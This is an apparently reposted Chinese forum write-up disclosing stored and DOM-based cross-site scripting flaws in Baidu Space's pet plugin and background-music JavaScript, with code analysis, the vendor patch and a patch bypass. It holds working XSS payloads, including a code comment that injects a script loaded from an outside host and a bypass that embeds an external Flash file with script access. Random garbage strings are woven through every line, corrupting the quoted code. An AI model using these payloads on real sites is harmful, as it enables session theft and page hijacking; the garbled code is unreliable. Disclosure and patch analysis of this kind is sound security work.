百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
, U+ y$ b2 e, N9 L
5 |2 o% O- \( A, ~$ w2 W3 K) d3 N% z" G6 ?1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. . A% Q; R8 h+ B) R; i# }0 @
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
+ u2 k$ l$ J: u1 Z1 p# d8 M6 x! Z. _) T- N
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p> 9 I+ Y8 D* f; s+ V. a( P
其中BdUtil.insertWBR为
* \7 m* ^) \* H+ l/ Sfunction(text, step) {
+ c) o& u% h. d1 e: O: E var textarea = textAreaCache || getContainer(); ) ~3 U" p% X; ~4 g
if (!textarea) { - m5 \& Y; v* `* R2 i
return text;
7 ~1 ?" j( s( |+ {. D }
( V9 Q2 A& C6 |' K& U# J textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
1 [, o2 H, m) R z var string = textarea.value;
6 a$ ^. C4 d e var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
`; I* h0 J$ U: x1 g var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
% p4 c6 M* g6 ^+ `3 | T+ b return result;
- ?9 u: a4 {( g} 2 _' m c& ]* X+ `
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. / K! R* P9 b; i+ Z
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> 7 I1 W, @5 y/ C: t5 d- u/ @5 d
- Q+ j$ t3 x% T- o3 {0 l( h, w
二:creatbgmusic() Dom-Xss Bug
) i: V# E& A! f8 \# H百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 0 P# l) \% x6 y/ A
% h, P& r& {( j% G& Z+ {
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
# Q; w* Q0 o) c4 i9 ~* g( }; t4 f) @7 t8 Y
function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
- y0 r4 n8 G+ C3 g //传入的murl赋值到bgmusic1和bgmusic2中
z; B" z9 M9 S0 E3 ?4 h+ E //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
0 b3 y* ~& z& g" ^ var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
( {3 l6 H1 s1 P3 e& D if (musicnum <= 1) { 2 F8 a9 J; h5 a5 p5 R: F! A
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
3 D* V" z3 _5 C7 Q* `& s }
5 H2 X! X: k( U. y, D bgmusic1 += "</OBJECT>";
' _' w) [1 ~0 A& Y0 u( b2 n- [ var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; ( O j" E9 m9 ~6 u' S6 S
if (musicnum <= 1) { - W0 {4 C7 U4 x+ Y7 h
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; ; m: b2 L2 F$ m( J
}
, }5 c! ]3 n' ~ bgmusic2 += "> </EMBED>";
0 j& ^! l/ \' z1 Z var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
. e8 L$ |; m; g var bgmus = detectWMP();
7 b" w" j, G; ?9 W) b% k, O+ W- { if (functype == "FckMusicHelper") {
3 `0 }/ ^, k" B) u3 W if (bgmus.installed) {
( p5 X0 ]8 J4 K3 s! i' Y* q if (bgmus.type == "IE") { ( ]. c: G: a" j2 n1 | w6 Q
return bgmusic1; & G; y+ Y+ b0 u$ {( o
} else if (bgmus.type == "NS") {
, F1 [0 {# q, W* r# G* I8 j- A' Z9 b return bgmusic2; 8 w8 \1 K/ ^& w0 F. ]. `$ Y
}
! {, t! K% y, f } else {
8 U4 F# G" B2 c+ h) M0 I/ a5 L return bgmusic3; ( k. J' C# w( e# r
} 6 N) d" T) _) R" K& D
} else { % T' v3 V% W. A! S% C0 t
if (bgmus.installed) { 2 x( z4 s$ l! h0 t# T
//document.write 直接输出bgmusic变量 导致xss : D2 | z: I, q6 t0 v
if (bgmus.type == "IE") {
& D U5 C& j2 l2 X7 O( x document.write(bgmusic1);
( r& a% {. s6 z4 v$ I+ g6 a } else if (bgmus.type == "NS") {
A) y. z" [. ~) R/ P: } document.write(bgmusic2);
! k0 I$ Y+ N1 @0 a9 H* P# s } ' L# v: N6 f9 j* V* L
} else { ; c8 Y: h/ S* C3 n
document.write(bgmusic3); # Z' |6 v$ o5 l
}
- [4 K# i, ^& O3 ~; t return "";
' {7 W, l+ O8 i! h5 {3 H3 W } 9 x _: _1 ~2 n' Y4 M
} " f5 {! t8 l3 L% k! z# ~. N
& s0 V' G- N$ `7 s+ `
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
: X1 j- d7 y1 C" Z; H" k
" i+ e. s9 u- }9 k: T! L4 Pfunction initBlogTextForFCK(){ * J$ S8 [+ |8 S k3 u% E
//fck init music
0 Y& X! S2 K m' X" Y6 _- l# [if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} E, ~# r8 f0 [9 R: \
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
. K; i" L3 E4 X' ?var isAutoPlay=true; , U& s# F" h* Z! A1 h, d
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
! }* |7 L- j0 \( Y var img=imgBox; 3 D$ N6 i6 c @
if(img.getAttribute(’rel’)){
$ |" w$ g- x$ G+ I, R% j8 N0 R5 M var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc ! n' y* U( f1 j: r0 K1 B9 I
var musicDiv = document.createElement("SPAN");
0 }+ b. u% J8 m" ]) h0 v var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
" v" E' j8 f1 y# u8 F; p & J. m* J& Z5 ^: ]$ u
..........................
3 V% Q( B/ b# u
5 Y- u; o6 ]8 {( r) v Q4 R' ?3 b //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
/ S+ o4 _3 D6 c K0 `! n var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); $ L' ~3 W; G8 q, c
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); + N3 ?1 z' @* s) m" U) ?* W
musicDiv.innerHTML=shtml; 3 s9 \4 J" Q X2 R
i--;n--; 2 Y9 i7 J* p7 e* t6 Y" v+ ~
}
8 R/ i" A: B) C( O8 {* I} / X2 e5 ]) h8 E" v y1 u8 G
4 g! X( m6 {1 c; K从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
9 X( ]9 i+ f3 V' |6 a P
# T/ S' J4 y" d. B测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
2 Z0 H& P C8 j
1 Q/ O% [4 @$ z* H等待官方补丁
; a# n/ Y0 X! b8 b7 l+ \. a* r' w5 W9 F
update 2010年5月13日 / H$ z$ S; \7 \/ I( Y8 f) W
U% @0 d& F& P0 w- p! u
官方补丁:
$ }) U+ b/ R) t. Q9 k U2 N: d8 @( d& | D1 J" H* E
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 3 Z5 h m/ e4 {( I& R' Z, N' E) D
改为:
/ y; T X9 v& r5 v4 `% Dvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); ! p/ e6 ?4 l# Z0 h& W
9 W+ [6 Q$ T Q L
update 2010年5月13日 21:50:37 3 v8 a7 k/ `, S" @
. Y. ?% v0 i5 d4 V8 d. g `8 _7 c
补丁存在漏洞 没有过滤" 可以继续跨: 3 m9 d2 T# F" \5 x. ^4 g" ?1 ~
! S2 I7 L* ~0 J* P& a9 i& n
NEW POC: 7 G& O4 x0 J' y8 f1 F& f5 w
# x+ D [5 G" _' Y7 y<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" - A& G; t& P# j# o. x# R* F1 u
% m% b! v, b; J& F" Rallowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>6 d+ O( b* \ N9 R
$ E+ k8 }: z/ s' u
|
发表于 2013-8-24 11:51:11
收藏
支持
反对